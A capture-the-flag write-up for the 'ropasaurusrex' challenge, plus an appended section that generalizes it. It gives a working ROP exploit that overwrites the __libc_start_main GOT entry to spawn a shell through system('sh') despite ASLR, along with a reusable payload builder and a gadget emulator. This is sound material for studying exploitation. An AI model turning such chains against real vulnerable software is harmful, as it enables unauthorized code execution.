This is one of the best binary problems that I have solved. I solved this problem 1 year back but forgot to update.
This problem is entirely about bypassing ASLR by overwriting a GOT entry. Instead of leaking a libc address, the ROP chain adds the constant distance between __libc_start_main and system to the __libc_start_main GOT entry; that distance does not change when ASLR relocates libc, so no leak is needed.
As many writeups already explain this same problem, I am not planning to give the entire description of the exploit.
```python
from pwn import *
import sys

# Run as:  (cat inp /dev/stdin) | ./ropasaurusrex
# so stdin stays open for the shell that gets spawned as the child process.

# Addresses from the binary and the libc it was tested against:
#got_libc_start_main = 0x8049618
#__libc_start_main   = 0xf7e22990
#system              = 0xf7e49190
# system - __libc_start_main = 0x26800, constant for this libc whatever base ASLR picks

# Gadgets:
#0x080484b5: pop ebx ; pop esi ; pop edi ; pop ebp ; ret ; (1 found)
#0x080483bb: xchg eax, esi ; add al, 0x08 ; add dword [ebx+0x5D5B04C4], eax ; ret ; (1 found)
# value for ebx: 0xaaa99154, since 0xaaa99154 + 0x5D5B04C4 wraps (mod 2**32) to 0x08049618, the GOT entry
# value for esi: 0x268f8, since 'add al, 0x08' wraps al from 0xf8 to 0x00 and leaves eax = 0x26800
# address of "sh": 0x804867f

payload  = b""
payload += b"A" * 140              # offset to reach the saved eip
payload += p32(0x080484b5)         # pop ebx ; pop esi ; pop edi ; pop ebp ; ret
payload += p32(0xaaa99154)         # ebx
payload += p32(0x268f8)            # esi, becomes eax after the xchg
payload += p32(0xdeedbeef)         # edi (junk)
payload += p32(0xcafebabe)         # ebp (junk)
payload += p32(0x080483bb)         # eax = 0x26800 ; GOT[__libc_start_main] += eax -> now points at system
payload += p32(0x0804835c)         # transfers control through the patched GOT entry, i.e. into system
payload += p32(0x0804867f)         # first argument to system: "sh"

sys.stdout.buffer.write(payload)   # Python 3: emit the raw bytes, not their repr
```
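The chain above depends on two pieces of wrap-around arithmetic that are easy to get wrong: the `add al, 0x08` in the write gadget only touches the low byte of eax, and the `ebx+0x5D5B04C4` displacement has to overflow back onto the GOT slot. The following is an added example, not part of the original write-up, that derives both values from a target GOT slot and a libc delta (so it works for any libc base, and for any other GOT entry or libc function pair), builds the same payload with `struct` instead of pwntools, and runs a tiny model of the two gadgets to confirm the GOT slot ends up holding `system`. The constant `0x0804835c` is assumed here to be the point that re-enters __libc_start_main through its PLT/GOT slot, as the write-up's chain implies; the page itself does not say what it is.

```python
import struct

# Constants taken from the write-up (ropasaurusrex, 32-bit x86).
GOT_LIBC_START_MAIN = 0x08049618
GADGET_DISP = 0x5D5B04C4     # displacement in "add dword [ebx+0x5D5B04C4], eax"
POP4_RET = 0x080484B5        # pop ebx ; pop esi ; pop edi ; pop ebp ; ret
XCHG_ADD = 0x080483BB        # xchg eax, esi ; add al, 0x08 ; add [ebx+disp], eax ; ret
CALL_LSM = 0x0804835C        # assumed: re-enters __libc_start_main via its PLT/GOT slot
SH_ADDR = 0x0804867F         # address of "sh" in the binary, per the write-up
OFFSET_TO_EIP = 140          # 136-byte buffer + saved ebp


def libc_delta(libc_start_main, system):
    """Distance from __libc_start_main to system; unchanged by an ASLR slide."""
    return (system - libc_start_main) & 0xFFFFFFFF


def esi_immediate(delta):
    """Value to pop into esi so that eax == delta after 'add al, 0x08'.

    The gadget only modifies al, so pre-subtract 8 from the low byte mod 256
    and keep the upper three bytes of the delta untouched.
    """
    return (delta & 0xFFFFFF00) | ((delta - 8) & 0xFF)


def ebx_for_target(target):
    """ebx such that ebx + GADGET_DISP wraps (mod 2**32) onto the target slot."""
    return (target - GADGET_DISP) & 0xFFFFFFFF


def build_payload(libc_start_main, system, got=GOT_LIBC_START_MAIN):
    """Same layout as the write-up's chain, with the constants derived."""
    delta = libc_delta(libc_start_main, system)
    chain = [
        POP4_RET,
        ebx_for_target(got),      # ebx
        esi_immediate(delta),     # esi -> eax after the xchg
        0xDEEDBEEF,               # edi (junk)
        0xCAFEBABE,               # ebp (junk)
        XCHG_ADD,                 # GOT[got] += delta
        CALL_LSM,                 # call through the patched slot
        SH_ADDR,                  # argument: "sh"
    ]
    return b"A" * OFFSET_TO_EIP + b"".join(struct.pack("<I", w) for w in chain)


def emulate(payload, got_value, got=GOT_LIBC_START_MAIN):
    """Model the two gadgets on a payload; return the GOT slot's new value.

    Raises if the chain does not start with the expected gadgets or if the
    ebx+disp computation lands somewhere other than the intended GOT slot.
    """
    nwords = (len(payload) - OFFSET_TO_EIP) // 4
    words = struct.unpack("<%dI" % nwords, payload[OFFSET_TO_EIP:OFFSET_TO_EIP + 4 * nwords])
    if words[0] != POP4_RET or words[5] != XCHG_ADD:
        raise ValueError("unexpected chain layout")
    ebx, esi = words[1], words[2]
    eax = len(payload)                                  # read() returns the byte count
    eax, esi = esi, eax                                 # xchg eax, esi (old eax discarded)
    eax = (eax & 0xFFFFFF00) | ((eax + 8) & 0xFF)       # add al, 0x08: only al changes
    addr = (ebx + GADGET_DISP) & 0xFFFFFFFF             # 32-bit address wrap
    if addr != got:
        raise ValueError("write gadget targets 0x%08x, not the GOT slot" % addr)
    return (got_value + eax) & 0xFFFFFFFF               # add dword [ebx+disp], eax


if __name__ == "__main__":
    lsm, sysm = 0xF7E22990, 0xF7E49190                  # values quoted in the write-up
    p = build_payload(lsm, sysm)
    print("esi immediate: 0x%x  ebx: 0x%08x" % (esi_immediate(libc_delta(lsm, sysm)),
                                                 ebx_for_target(GOT_LIBC_START_MAIN)))
    print("GOT after chain: 0x%08x (system = 0x%08x)" % (emulate(p, lsm), sysm))
```

Running it reproduces the write-up's `0x268f8` and `0xaaa99154` from the raw addresses, and the emulation shows the GOT slot landing exactly on `system` both for the quoted addresses and for a libc mapped at a different base, which is the whole reason the chain survives ASLR.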